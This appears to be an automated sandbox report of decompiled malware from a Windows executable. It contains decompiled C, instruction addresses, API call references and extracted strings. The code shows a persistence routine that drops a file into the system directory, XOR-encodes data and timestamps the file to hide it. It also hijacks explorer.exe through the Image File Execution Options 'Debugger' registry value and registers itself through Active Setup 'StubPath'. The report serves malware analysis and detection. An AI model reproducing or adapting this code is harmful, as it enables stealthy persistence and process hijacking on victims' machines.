							if(_t578 == 0) {
								_t580 = CreateFileA( &(_t780[0x170]), 0x80000000, 1, 0, 3, 0, 0);
								_t780[0x28] = _t580;
								__eflags = _t580;
								if(_t580 == 0) {
									goto L67;
								}
								__eflags = _t580 - 0xffffffff;
								if(_t580 == 0xffffffff) {
									goto L67;
								}
								_t581 = GetFileSize(_t580, 0);
								_t780[0x1d] = _t581;
								__eflags = _t581 - _t777;
								if(_t581 == _t777) {
									_t584 = E00401000(_t777);
									_t770 = _t584;
									ReadFile(_t780[0x2c], _t584, _t777,  &(_t780[0x28]), 0);
									_t698 = _t780[0x1d];
									_t748 = _t770;
									_t756 = _t780[5];
									__eflags = _t770 - _t770 + _t698;
									while(__eflags < 0) {
										_t718 =  *_t748 & 0x000000ff;
										__eflags = _t780[0x162] - ( *_t756 & 0x000000ff);
										if(__eflags == 0) {
											__eflags = _t718;
										}
										if(__eflags == 0) {
											_t748 =  &(_t748[1]);
											_t756 =  &(_t756[1]);
											__eflags = _t748 - _t770 + _t698;
											continue;
										} else {
											E00401029(_t770);
											goto L71;
										}
									}
									E00401029(_t770);
									goto L100;
								}
								L71:
								CloseHandle(_t780[0x28]);
							}
							goto L67;
						}
						_t699 =  &(_t780[0x3cb]);
						_t596 = GetSystemDirectoryA(_t699, 0x104);
						_push( *0x412090);
						_push(0x41103e);
						_push(_t699);
						L00405E30();
						_push(_t596);
						L00405E30();
						_t597 = "{0C8E6D89-EA51-848A-7775-6C2CC072CA88}";
						while(1) {
							__eflags = _t597 - 0x407286;
							if(_t597 >= 0x407286) {
								break;
							}
							 *_t597 =  *_t597 ^ 0x000000d4;
							_t597 =  &(_t597[1]);
						}
						_t598 = CreateMutexA(0, 0, "{0C8E6D89-EA51-848A-7775-6C2CC072CA88}"); // executed
						_t780[0x28] = _t598;
						__eflags = _t598;
						if(_t598 == 0) {
							Sleep(0x7d0);
						} else {
							WaitForSingleObject(_t598, 0x2710);
							CloseHandle(_t780[0x28]);
						}
						_t700 =  &(_t780[0x3cb]);
						SetFileAttributesA(_t700, 0x80); // executed
						_t600 = CreateFileA(_t700, 0x40000000, 0, 0, 2, 0x80, 0); // executed
						_t780[0x28] = _t600;
						__eflags = _t600;
						if(_t600 == 0) {
							L60:
							RegCloseKey(_t780[0x26]); // executed
							RegDeleteKeyA(0x80000001,  &(_t780[0x40e])); // executed
							goto L61;
						} else {
							__eflags = _t600 - 0xffffffff;
							if(_t600 == 0xffffffff) {
								goto L60;
							}
							WriteFile(_t600, 0x4072a0, 0x800,  &(_t780[0x28]), 0); // executed
							_t605 = E004010B2();
							_t780[6] = _t605;
							__eflags = _t605;
							if(_t605 == 0) {
								_t780[6] = 0xc6;
							}
							_t607 = E00401000(_t777 + 0x64);
							 *((char*)(_t607 + _t777)) = 0;
							_t757 = _t607;
							_t771 = _t607;
							_t750 = _t780[5];
							_t608 = _t607 + _t777;
							while(1) {
								__eflags = _t771 - _t608;
								if(_t771 >= _t608) {
									break;
								}
								_t633 = _t780[6] & 0x000000ff ^  *_t750;
								_t750 =  &(_t750[0]);
								 *_t771 = _t633;
								_t771 = _t771 + 1;
								_t608 = _t757 + _t777;
							}
							_t609 =  &(_t780[0x55a]);
							_t701 = _t757 + _t777;
							_push(_t609);
							L00405E40();
							_t772 = _t701 +  &(_t609[1]);
							__eflags = _t772 - _t701 + 0x64;
							while(__eflags < 0) {
								 *_t772 = E004010B2();
								_t772 = _t772 + 1;
								_t93 = _t777 + 0x64; // 0x64
								__eflags = _t772 - _t757 + _t93;
							}
							 *(_t757 + _t777 + 1) = _t777;
							_t703 = _t757 + _t777;
							_push( &(_t780[0x55a]));
							_t773 = _t703;
							_push( &(_t703[1]));
							L00405E20();
							_t612 =  &(_t703[0x19]);
							while(1) {
								__eflags = _t773 - _t612;
								if(_t773 >= _t612) {
									break;
								}
								 *_t773 =  *_t773 ^ _t780[6] & 0x000000ff;
								_t773 =  &(_t773[0]);
								_t102 = _t777 + 0x64; // 0x64
								_t612 = _t757 + _t102;
							}
							WriteFile(_t780[0x2c], _t757, _t777 + 0x64,  &(_t780[0x28]), 0); // executed
							E00401029(_t757);
							__eflags = _t780[3];
							if(_t780[3] != 0) {
								SetFileTime(_t780[0x2b],  &(_t780[0x21]),  &(_t780[0x22]),  &(_t780[0x23])); // executed
							}
							CloseHandle(_t780[0x28]); // executed
							_t704 =  &(_t780[0x3d0]);
							CreateFileA(_t704, 0x80000000, 1, 0, 3, 0, "true"); // executed
							E00401251(_t780[0x26]);
							_t780[0x27] = 1;
							_t622 = RegSetValueExA(_t780[0x2b], "IsInstalled", 0, 4,  &(_t780[0x28]), 4); // executed
							_push(_t704);
							L00405E40();
							_t623 = _t622 + 1;
							__eflags = _t623;
							RegSetValueExA(_t780[0x2b], "StubPath", 0, 1, _t704, _t623); // executed
							_t780[0xa] = 1;
							goto L60;
						}
					}
					__eflags =  *((char*)(_t779 + 0x1e8));
					if( *((char*)(_t779 + 0x1e8)) != 0) {
						_push(_t674);
						_t636 = _t779 + 0x1bc;
						_push(_t636);
						L00405E20();
						while(1) {
							_t705 = _t779 + 0x1b8;
							_push(_t705);
							L00405E40();
							__eflags = _t636 - 0xf;
							if(_t636 > 0xf) {
								goto L30;
							}
							_t636 = _t779 + 0x1e8;
							_push(_t636);
							_push(_t705);
							L00405E30();
						}
						goto L30;
					}
					goto L26;
				} else {
					_t706 = _t779 + 0x123c;
					_t637 = GetSystemDirectoryA(_t706, 0x104);
					_push( *0x4120a0);
					_push(0x41103e);
					_push(_t706);
					L00405E30();
					_push(_t637);
					L00405E30();
					_t638 = "{1A59D3E9-9D17-EB65-EA3F-071C953972C0}";
					L2:
					if(_t638 < 0x407b06) {
						 *_t638 =  *_t638 ^ 0x000000d4;
						_t638 =  &(_t638[1]);
						goto L2;
					}
					_t639 = CreateMutexA(0, 0, "{1A59D3E9-9D17-EB65-EA3F-071C953972C0}"); // executed
					 *(_t779 + 0xa0) = _t639;
					__eflags = _t639;
					if(_t639 == 0) {
						Sleep(0x7d0);
					} else {
						WaitForSingleObject(_t639, 0x2710);
						CloseHandle( *(_t779 + 0xa0)); // executed
					}
					_t707 = _t779 + 0x123c;
					SetFileAttributesA(_t707, 0x80); // executed
					_t641 = CreateFileA(_t707, 0x40000000, 0, 0, 2, 0x80, 0); // executed
					 *(_t779 + 0xa0) = _t641;
					__eflags = _t641;
					if(_t641 == 0) {
						L23:
						RegCloseKey( *(_t779 + 0x98)); // executed
						goto L24;
					} else {
						__eflags = _t641 - 0xffffffff;
						if(_t641 != 0xffffffff) {
							WriteFile(_t641, 0x407b20, 0xc00, _t779 + 0xa0, 0); // executed
							_t644 = E004010B2();
							 *(_t779 + 0x1b) = _t644;
							__eflags = _t644;
							if(_t644 == 0) {
								 *(_t779 + 0x1b) = 0x66;
							}
							_t646 = E00401000(_t777 + 0x64);
							 *((char*)(_t646 + _t777)) = 0;
							_t758 = _t646;
							_t774 = _t646;
							_t753 =  *(_t779 + 0x14);
							_t647 = _t646 + _t777;
							L12:
							__eflags = _t774 - _t647;
							if(_t774 < _t647) {
								_t671 =  *(_t779 + 0x1b) & 0x000000ff ^  *_t753;
								_t753 =  &(_t753[0]);
								 *_t774 = _t671;
								_t774 = _t774 + 1;
								_t647 = _t758 + _t777;
								goto L12;
							}
							_t648 = _t779 + 0x1568;
							_t708 = _t758 + _t777;
							_push(_t648);
							L00405E40();
							_t775 = _t708 + _t648 + 5;
							__eflags = _t775 - _t708 + 0x64;
							while(__eflags < 0) {
								 *_t775 = E004010B2();
								_t775 = _t775 + 1;
								_t21 = _t777 + 0x64; // 0x64
								__eflags = _t775 - _t758 + _t21;
							}
							 *(_t758 + _t777 + 1) = _t777;
							_t710 = _t758 + _t777;
							_push(_t779 + 0x1568);
							_t776 = _t710;
							_push( &(_t710[1]));
							L00405E20();
							_t651 =  &(_t710[0x19]);
							while(1) {
								__eflags = _t776 - _t651;
								if(_t776 >= _t651) {
									break;
								}
								 *_t776 =  *_t776 ^  *(_t779 + 0x1b) & 0x000000ff;
								_t776 =  &(_t776[0]);
								_t30 = _t777 + 0x64; // 0x64
								_t651 = _t758 + _t30;
							}
							WriteFile( *(_t779 + 0xb0), _t758, _t777 + 0x64, _t779 + 0xa0, 0); // executed
							E00401029(_t758);
							__eflags =  *(_t779 + 0xc);
							if( *(_t779 + 0xc) != 0) {
								SetFileTime( *(_t779 + 0xac), _t779 + 0x84, _t779 + 0x88, _t779 + 0x8c); // executed
							}
							CloseHandle( *(_t779 + 0xa0));
							_t711 = _t779 + 0x1250;
							CreateFileA(_t711, 0x80000000, 1, 0, 3, 0, 0); // executed
							RegDeleteValueA( *(_t779 + 0x9c), "Debugger"); // executed
							_t660 = E00401251( *(_t779 + 0x98));
							_push(_t711);
							L00405E40();
							_t661 = _t660 + 1;
							__eflags = _t661;
							RegSetValueExA( *(_t779 + 0xac), "Debugger", 0, 1, _t711, _t661); // executed
							 *(_t779 + 0x2c) = 1;
						}
						goto L23;
					}
				}
			}

0x0040458d
0x00404594
0x004047c9
0x004047c9
0x004047d6
0x004047de
0x004047e3
0x004047e5
0x004047f1
0x004047f1
0x004047fd
0x004047fe
0x00404835
0x004048cf
0x004048d4
0x004048d7
0x004048dc
0x004048dc
0x004048e1
0x00000000
0x00000000
0x004048e3
0x004048e6
0x004048e6
0x004048ee
0x004048ee
0x004048f3
0x00000000
0x00000000
0x004048f5
0x004048f5
0x004048f6
0x004048f6
0x004048fb
0x00404900
0x00404905
0x0040490c
0x0040490d
0x00404912
0x00404913
0x00404926
0x0040492b
0x0040492d
0x00404b8d
0x00404b94
0x00404b99
0x00404ba0
0x00404ba2
0x00404ce5
0x00404ce5
0x00404cea
0x00404cec
0x00404cee
0x00404cf0
0x00404cf0
0x00404cf2
0x00404cf9
0x00404cfe
0x00404d00
0x00404d02
0x00404d04
0x00404d04
0x00404d06
0x00404d0d
0x00404d1a
0x00404d1b
0x00404d27
0x00404d2f
0x00404d30
0x00404d35
0x00404d39
0x00404d3c
0x00404d3c
0x00404d3e
0x00000000
0x00000000
0x00404d48
0x00404d4a
0x00404d4f
0x00404d4f
0x00404d58
0x00404d65
0x00404d6a
0x00404d6c
0x00404dad
0x00404dad
0x00404dba
0x00404dbf
0x00404dc1
0x00404e76
0x00404e7a
0x00404e84
0x00404e8c
0x00404e91
0x00404e96
0x00404e9c
0x00404ea1
0x00404ea2
0x00404ea8
0x00404eae
0x00404ec6
0x00404ecb
0x00404ed2
0x00404ed4
0x00404f78
0x00404f78
0x00404f7d
0x00404f80
0x00404fa3
0x00404fb0
0x00404fb5
0x00404fba
0x00404fc1
0x00404fc7
0x00404fdf
0x00404fe4
0x00404feb
0x00404fed
0x00404ff6
0x00404ff6
0x00404ffb
0x00404ffe
0x00000000
0x00000000
0x00405006
0x0040500b
0x00405010
0x00405017
0x0040501d
0x00405035
0x0040503a
0x00405041
0x00405043
0x0040504c
0x0040504c
0x00405051
0x00405054
0x00000000
0x00000000
0x00405080
0x00405085
0x00405092
0x00405097
0x0040509c
0x004050a3
0x004050a9
0x004050c1
0x004050c6
0x004050cd
0x004050cf
0x004050d1
0x004050d8
0x004050d8
0x004050e5
0x004050ea
0x004050ef
0x004050f6
0x004050fc
0x00405114
0x00405119
0x00405120
0x00405122
0x00405124
0x00405153
0x00405153
0x0040515b
0x0040515b
0x00405163
0x0040517c
0x0040517c
0x00405186
0x0040518e
0x00405193
0x00405198
0x00405199
0x004051a0
0x004051b0
0x004051b7
0x004051c7
0x004051ce
0x004051d3
0x004051d8
0x004051d8
0x004051dd
0x00000000
0x00000000
0x004051df
0x004051e2
0x004051e2
0x004051fe
0x00405203
0x00405205
0x00405229
0x00405229
0x0040522e
0x00405237
0x0040523e
0x00405243
0x00405244
0x00405249
0x00405249
0x0040525d
0x0040525d
0x0040526e
0x0040527a
0x0040527f
0x0040527f
0x00405286
0x004054f1
0x00405509
0x0040550f
0x00405514
0x00405519
0x00405519
0x0040551e
0x00000000
0x00000000
0x00405520
0x00405523
0x00405523
0x00405526
0x0040552e
0x00405538
0x0040553d
0x00405542
0x00000000
0x00000000
0x00405548
0x00405550
0x00405558
0x0040555d
0x0040555f
0x004057d5
0x004057d5
0x004057f2
0x004057f2
0x004057fa
0x004057fa
0x00405802
0x00405804
0x00405806
0x0040580b
0x00405810
0x00405815
0x0040581a
0x0040581f
0x0040582c
0x00405831
0x00405831
0x00405834
0x00405839
0x00405841
0x00405849
0x00405863
0x00405868
0x0040586a
0x00405873
0x00405878
0x0040589d
0x004058a2
0x004058a3
0x004058a8
0x004058a8
0x004058bb
0x004058c7
0x004058c7
0x0040586a
0x004058cc
0x004058d1
0x004058d8
0x00405933
0x00405938
0x0040593a
0x00405957
0x00405957
0x0040595e
0x0040595f
0x00405964
0x00405964
0x00405965
0x00405966
0x00405967
0x00405969
0x0040596b
0x00000000
0x0040596b
0x0040594e
0x00405953
0x00405955
0x00000000
0x00000000
0x00000000
0x004058da
0x004058dc
0x004058e4
0x004058f4
0x004058f9
0x004058fb
0x00405989
0x00405989
0x0040598e
0x00000000
0x00000000
0x00405996
0x004059b8
0x004059bd
0x004059bf
0x004059e7
0x00405a04
0x00405a10
0x00405a15
0x00405a17
0x00405a1f
0x00405a24
0x00405a2b
0x00405a32
0x00405a9f
0x00405aa4
0x00405aa6
0x00000000
0x00000000
0x00405aa8
0x00405aa9
0x00405abe
0x00405ada
0x00405ae6
0x00405af6
0x00405afb
0x00405afd
0x00000000
0x00000000
0x00405aff
0x00405b06
0x00000000
0x00405b06
0x00405a3f
0x00405a44
0x00405a46
0x00000000
0x00000000
0x00405a53
0x00405a58
0x00405a59
0x00405a71
0x00405a8d
0x00000000
0x00405a8d
0x004059de
0x004059e3
0x004059e5
0x00000000
0x00000000
0x00000000
0x004059e5
0x00405908
0x0040590d
0x0040590e
0x00405914
0x00405915
0x00405916
0x00405918
0x0040591a
0x00405971
0x00405978
0x00405984
0x00000000
0x00405984
0x00405b0b
0x00405b15
0x00405b1f
0x00405b24
0x00405b24
0x00405b24
0x00405b24
0x00405b4c
0x00405b51
0x00405b53
0x00405b59
0x00405b66
0x00405b78
0x00405b7d
0x00405b7f
0x00405b85
0x00405b86
0x00405b88
0x00405b8c
0x00405bae
0x00405bb8
0x00405bbd
0x00405bc4
0x00405be5
0x00405bc6
0x00405bd1
0x00405bd9
0x00405bd9
0x00405b8e
0x00405b9e
0x00405b9e
0x00405b8c
0x00405bee
0x00405bee
0x00000000
0x00405b53
0x00405583
0x00405588
0x0040558a
0x004057de
0x004057e2
0x00000000
0x00000000
0x004057e4
0x004057e4
0x00000000
0x004057e4
0x00405590
0x00405595
0x0040559a
0x004055a7
0x004055bf
0x004055c4
0x004055c6
0x004055dc
0x004055e8
0x004055ed
0x00405669
0x00405669
0x00405670
0x004056a9
0x004056a9
0x004056cf
0x004056d1
0x004056e7
0x004056e7
0x004056ec
0x004056ee
0x004057cc
0x004057d0
0x00000000
0x004057d0
0x004056f4
0x004056fd
0x004056ff
0x00405705
0x00405708
0x0040572b
0x0040572b
0x00405738
0x00405750
0x00405755
0x00405757
0x00405761
0x00405761
0x00405766
0x00405769
0x0040576d
0x0040576d
0x0040577c
0x00405781
0x00000000
0x00405783
0x00405783
0x00405788
0x0040578a
0x00000000
0x00000000
0x0040578c
0x00405795
0x00405797
0x0040579d
0x004057a0
0x00000000
0x00000000
0x004057a2
0x004057a4
0x004057a5
0x004057a7
0x004057a9
0x004057ae
0x004057b5
0x004057be
0x004057c3
0x00000000
0x004057c3
0x00405781
0x00405712
0x00405716
0x0040571a
0x0040571c
0x0040571d
0x0040571f
0x00405721
0x00000000
0x00405721
0x004056e0
0x004056e5
0x00000000
0x00000000
0x00000000
0x004056e5
0x00405672
0x0040567b
0x0040567d
0x00405683
0x00405686
0x00000000
0x00000000
0x00405690
0x00405694
0x00405698
0x0040569a
0x0040569b
0x0040569d
0x0040569f
0x00000000
0x0040569f
0x004055ef
0x004055f4
0x004055f6
0x00000000
0x00000000
0x00405605
0x0040560b
0x0040560d
0x0040560f
0x00405611
0x00405619
0x0040561f
0x00405622
0x00405624
0x00405624
0x00405622
0x0040562a
0x0040562f
0x00405631
0x0040565f
0x00405633
0x0040563b
0x00405640
0x00405642
0x00405647
0x0040564d
0x0040564f
0x00405654
0x00405656
0x00405656
0x00405654
0x00405658
0x00405658
0x00000000
0x00405631
0x004055cc
0x004055d1
0x004055d6
0x00000000
0x00000000
0x00000000
0x004057ee
0x004057ee
0x004057ee
0x004057ee
0x00000000
0x004057ee
0x0040552e
0x0040528c
0x00405291
0x00405291
0x00405296
0x00000000
0x00000000
0x00405298
0x0040529b
0x0040529b
0x0040529e
0x004052a3
0x004052a3
0x004052a8
0x00000000
0x00000000
0x004052aa
0x004052ad
0x004052ad
0x004052b0
0x004052c2
0x004052c7
0x004052c9
0x004052e5
0x004052f1
0x004052f1
0x004052f6
0x004052fb
0x004052fb
0x00405300
0x00000000
0x00000000
0x00405302
0x00405305
0x00405305
0x00405308
0x0040530d
0x0040530d
0x00405312
0x00000000
0x00000000
0x00405314
0x00405317
0x00405317
0x0040531a
0x0040531f
0x0040531f
0x00405324
0x00000000
0x00000000
0x00405326
0x00405329
0x00405329
0x0040532c
0x00405331
0x00405331
0x00405336
0x00000000
0x00000000
0x00405338
0x0040533b
0x0040533b
0x0040533e
0x00405343
0x00405343
0x00405348
0x00000000
0x00000000
0x0040534a
0x0040534d
0x0040534d
0x00405362
0x00405367
0x00405369
0x0040536d
0x00405385
0x0040539d
0x004053b5
0x004053cd
0x004053d9
0x004053d9
0x004053de
0x004053e3
0x004053e3
0x004053e8
0x00000000
0x00000000
0x004053ea
0x004053ed
0x004053ed
0x00405402
0x00405407
0x00405409
0x00000000
0x00000000
0x00405413
0x00405418
0x00405420
0x00405422
0x00405427
0x00405432
0x00405432
0x00405437
0x00000000
0x00000000
0x00405439
0x0040543c
0x0040543c
0x0040543f
0x00405484
0x00405488
0x00405488
0x004054ab
0x004054b0
0x004054b2
0x00000000
0x00000000
0x00405449
0x0040544e
0x00405457
0x0040545c
0x0040545e
0x00405468
0x00405468
0x0040545e
0x0040546d
0x0040546d
0x0040546d
0x00405471
0x00405479
0x00405479
0x004054b4
0x004054c7
0x004054c7
0x004054c8
0x004054d9
0x004054e0
0x004054ec
0x00000000
0x004054ec
0x00405220
0x00405225
0x00405227
0x00000000
0x00000000
0x00000000
0x00405227
0x00405126
0x00405129
0x00000000
0x00000000
0x0040512b
0x00405140
0x0040514c
0x00000000
0x0040514c
0x004050d3
0x004050d6
0x00000000
0x00000000
0x00000000
0x004050d6
0x00405045
0x00405046
0x00404ee1
0x00404efc
0x00404f01
0x00404f06
0x00404f27
0x00404f27
0x00404f33
0x00404f38
0x00404f40
0x00404f42
0x00404f47
0x00404f4f
0x00404f54
0x00404f57
0x00404f59
0x00404f5b
0x00404f5d
0x00404f63
0x00404f68
0x00404f68
0x00404f6b
0x00404f6d
0x00404f72
0x0040505c
0x0040505c
0x00405061
0x0040507b
0x00000000
0x0040507b
0x00000000
0x00405046
0x00404fef
0x00404ff0
0x00000000
0x00000000
0x00000000
0x00404ff0
0x00404f82
0x00404f82
0x00404f8a
0x00404f8c
0x00404f98
0x00000000
0x00404f98
0x00404eda
0x00404edb
0x00000000
0x00000000
0x00000000
0x00404dc7
0x00404dc7
0x00404dd7
0x00404ddc
0x00404dde
0x00000000
0x00000000
0x00404df7
0x00404dfc
0x00404e03
0x00404e05
0x00000000
0x00000000
0x00404e07
0x00404e08
0x00000000
0x00000000
0x00404e0a
0x00404e20
0x00404e2c
0x00404e48
0x00404e4d
0x00404e54
0x00404e5b
0x00404e62
0x00404e62
0x00404e64
0x00000000
0x00000000
0x00404e6e
0x00404e70
0x00404e71
0x00404e73
0x00404e73
0x00000000
0x00404e62
0x00404dc1
0x00404d6e
0x00404d75
0x00404d76
0x00404d78
0x00404d7d
0x00404d7e
0x00404d83
0x00404d85
0x00000000
0x00000000
0x00404d87
0x00404d89
0x00404d8e
0x00404d90
0x00404d92
0x00404d94
0x00404d99
0x00404d9a
0x00404d9f
0x00404da6
0x00404da8
0x00000000
0x00000000
0x00404daa
0x00404dab
0x00000000
0x00000000
0x00000000
0x00404dab
0x00404bae
0x00404bba
0x00404bbf
0x00404bc6
0x00404bcd
0x00404bd4
0x00404bd4
0x00404bd6
0x00000000
0x00000000
0x00404be0
0x00404be2
0x00404be3
0x00404be5
0x00404be5
0x00404be8
0x00404bee
0x00404bf5
0x00404bf6
0x00404bfb
0x00404bfd
0x00404c18
0x00404c1d
0x00404c25
0x00404c2b
0x00000000
0x00404c2b
0x00404c06
0x00404c07
0x00404c0e
0x00404c0f
0x00404c14
0x00404c16
0x00404c4c
0x00404c51
0x00404c58
0x00404c5a
0x00000000
0x00000000
0x00404c5c
0x00404c5f
0x00000000
0x00000000
0x00404c64
0x00404c69
0x00404c6d
0x00404c6f
0x00404c8c
0x00404c92
0x00404c9b
0x00404ca0
0x00404ca4
0x00404ca6
0x00404cad
0x00404caf
0x00404cb4
0x00404cb7
0x00404cbe
0x00404cc3
0x00404cc3
0x00404cc5
0x00404cd0
0x00404cd4
0x00404cd5
0x00000000
0x00404cc7
0x00404cc9
0x00000000
0x00404cc9
0x00404cc5
0x00404cdb
0x00000000
0x00404cdb
0x00404c71
0x00404c78
0x00404c78
0x00000000
0x00404c16
0x00404938
0x00404940
0x00404945
0x0040494b
0x00404950
0x00404951
0x00404956
0x00404957
0x0040495c
0x00404961
0x00404961
0x00404966
0x00000000
0x00000000
0x00404968
0x0040496b
0x0040496b
0x00404977
0x0040497c
0x00404983
0x00404985
0x004049a5
0x00404987
0x0040498d
0x00404999
0x00404999
0x004049af
0x004049b7
0x004049cf
0x004049d4
0x004049db
0x004049dd
0x00404b6f
0x00404b76
0x00404b88
0x00000000
0x004049e3
0x004049e3
0x004049e6
0x00000000
0x00000000
0x00404a01
0x00404a06
0x00404a0b
0x00404a0f
0x00404a11
0x00404a13
0x00404a13
0x00404a1b
0x00404a20
0x00404a25
0x00404a27
0x00404a29
0x00404a2d
0x00404a30
0x00404a30
0x00404a32
0x00000000
0x00000000
0x00404a39
0x00404a3b
0x00404a3c
0x00404a3e
0x00404a3f
0x00404a3f
0x00404a44
0x00404a4b
0x00404a4e
0x00404a4f
0x00404a54
0x00404a5b
0x00404a5d
0x00404a64
0x00404a66
0x00404a67
0x00404a6b
0x00404a6b
0x00404a6f
0x00404a7a
0x00404a7d
0x00404a81
0x00404a83
0x00404a84
0x00404a89
0x00404a8c
0x00404a8c
0x00404a8e
0x00000000
0x00000000
0x00404a95
0x00404a97
0x00404a98
0x00404a98
0x00404a98
0x00404ab4
0x00404abb
0x00404ac0
0x00404ac5
0x00404ae6
0x00404ae6
0x00404af2
0x00404b06
0x00404b0e
0x00404b1a
0x00404b1f
0x00404b44
0x00404b49
0x00404b4a
0x00404b4f
0x00404b4f
0x00404b62
0x00404b67
0x00000000
0x00404b67
0x004049dd
0x004047e7
0x004047ef
0x00404805
0x00404806
0x0040480d
0x0040480e
0x00404823
0x00404823
0x0040482a
0x0040482b
0x00404830
0x00404833
0x00000000
0x00000000
0x00404815
0x0040481c
0x0040481d
0x0040481e
0x0040481e
0x00000000
0x00404823
0x00000000
0x0040459a
0x0040459f
0x004045a7
0x004045ac
0x004045b2
0x004045b7
0x004045b8
0x004045bd
0x004045be
0x004045c3
0x004045c8
0x004045cd
0x004045cf
0x004045d2
0x00000000
0x004045d2
0x004045de
0x004045e3
0x004045ea
0x004045ec
0x0040460c
0x004045ee
0x004045f4
0x00404600
0x00404600
0x00404616
0x0040461e
0x00404636
0x0040463b
0x00404642
0x00404644
0x004047bd
0x004047c4
0x00000000
0x0040464a
0x0040464a
0x0040464d
0x00404668
0x0040466d
0x00404672
0x00404676
0x00404678
0x0040467a
0x0040467a
0x00404682
0x00404687
0x0040468c
0x0040468e
0x00404690
0x00404694
0x00404697
0x00404697
0x00404699
0x004046a0
0x004046a2
0x004046a3
0x004046a5
0x004046a6
0x00000000
0x004046a6
0x004046ab
0x004046b2
0x004046b5
0x004046b6
0x004046bb
0x004046c2
0x004046c4
0x004046cb
0x004046cd
0x004046ce
0x004046d2
0x004046d2
0x004046d6
0x004046e1
0x004046e4
0x004046e8
0x004046ea
0x004046eb
0x004046f0
0x004046f3
0x004046f3
0x004046f5
0x00000000
0x00000000
0x004046fc
0x004046fe
0x004046ff
0x004046ff
0x004046ff
0x0040471b
0x00404722
0x00404727
0x0040472c
0x0040474d
0x0040474d
0x00404759
0x0040476d
0x00404775
0x00404786
0x00404792
0x00404797
0x00404798
0x0040479d
0x0040479d
0x004047b0
0x004047b5
0x004047b5
0x00000000
0x0040464d
0x00404644

APIs

RegCreateKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe,?), ref: 0040458D
GetSystemDirectoryA.KERNEL32 ref: 004045A7
lstrcat.KERNEL32(?,0041103E), ref: 004045B8
lstrcat.KERNEL32(00000000,?), ref: 004045BE
CreateMutexA.KERNEL32(00000000,00000000,{1A59D3E9-9D17-EB65-EA3F-071C953972C0},00000000,?,0041103E,?,00000104,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe,?), ref: 004045DE
WaitForSingleObject.KERNEL32(00000000,00002710,00000000,00000000,{1A59D3E9-9D17-EB65-EA3F-071C953972C0},00000000,?,0041103E,?,00000104,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe,?), ref: 004045F4
CloseHandle.KERNEL32(?,00000000,00002710,00000000,00000000,{1A59D3E9-9D17-EB65-EA3F-071C953972C0},00000000,?,0041103E,?,00000104,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe,?), ref: 00404600
Sleep.KERNEL32(000007D0,00000000,00000000,{1A59D3E9-9D17-EB65-EA3F-071C953972C0},00000000,?,0041103E,?,00000104,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe,?), ref: 0040460C
SetFileAttributesA.KERNEL32(?,00000080,000007D0,00000000,00000000,{1A59D3E9-9D17-EB65-EA3F-071C953972C0},00000000,?,0041103E,?,00000104,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe,?), ref: 0040461E
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,000007D0,00000000,00000000,{1A59D3E9-9D17-EB65-EA3F-071C953972C0},00000000,?,0041103E), ref: 00404636
WriteFile.KERNEL32(00000000,00407B20,00000C00,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,000007D0,00000000), ref: 00404668
lstrlen.KERNEL32(?,00000000,00407B20,00000C00,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,000007D0), ref: 004046B6
lstrcpy.KERNEL32(?,?), ref: 004046EB
WriteFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,00000000,00407B20,00000C00,?,00000000,?,40000000,00000000), ref: 0040471B
SetFileTime.KERNEL32(?,?,?,?,?,00000000,?,?,00000000,?,?,?,00000000,00407B20,00000C00,?), ref: 0040474D
CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,00000000,00407B20,00000C00,?,00000000,?,40000000), ref: 00404759
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?), ref: 00404775
RegDeleteValueA.ADVAPI32(?,Debugger,?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,00000000,?,?,00000000,?), ref: 00404786

Part of subcall function 00401251: RegSetValueExW.ADVAPI32(?,?,00000000,00000001,00411035,00000004), ref: 004012B2

lstrlen.KERNEL32(?,?,Debugger,?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,00000000,?,?,00000000), ref: 00404798
RegSetValueExA.ADVAPI32(?,Debugger,00000000,00000001,?,00000001,?,?,Debugger,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004047B0
RegCloseKey.ADVAPI32(?,?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,000007D0,00000000,00000000,{1A59D3E9-9D17-EB65-EA3F-071C953972C0},00000000,?), ref: 004047C4
GetComputerNameA.KERNEL32 ref: 004047DE
lstrcpy.KERNEL32(?,QlC5hT0yHn63XEm5LqJ2OxSkGj2v), ref: 004047FE
lstrcpy.KERNEL32(?,?), ref: 0040480E
lstrlen.KERNEL32(?,?,?), ref: 0040482B
wsprintfA.USER32 ref: 004048CF

Strings

QlC5hT0yHn63XEm5LqJ2OxSkGj2v, xrefs: 004047F1
f, xrefs: 0040467A
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe, xrefs: 00404583
{38383738-3439-3838-3738-343938383738}, xrefs: 004048CA
Debugger, xrefs: 0040477A, 004047A4
{%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}, xrefs: 004048C5
SOFTWARE\Microsoft\Active Setup\Installed Components\, xrefs: 004048D7
{1A59D3E9-9D17-EB65-EA3F-071C953972C0}, xrefs: 004045C3, 004045D5

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
